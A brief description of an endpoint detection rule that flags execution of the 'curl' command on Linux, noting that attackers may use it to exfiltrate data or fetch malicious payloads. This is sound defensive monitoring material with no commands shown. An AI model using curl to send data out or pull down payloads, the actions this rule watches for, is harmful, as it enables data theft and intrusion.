
Summary
The detection rule is designed to identify the execution of the 'curl' command on Linux-based systems. Curl is a command-line tool commonly used to transfer data from or to a server using various protocols such as HTTP and FTP. The rule triggers when a process matching the image name '/curl' is started, which may indicate that a file download or a request to a remote server is occurring. This behavior can be exploited by attackers to exfiltrate data or download malicious payloads. Therefore, monitoring for unauthorized curl usage is vital for maintaining security and detecting potential command-and-control activities. The rule is marked with a low severity level, indicating that its occurrence may not necessarily be malicious but still warrants investigation, especially in unexpected contexts.
Categories
- Linux
- Endpoint
- Network
Data Sources
- Process
Created: 2022-09-15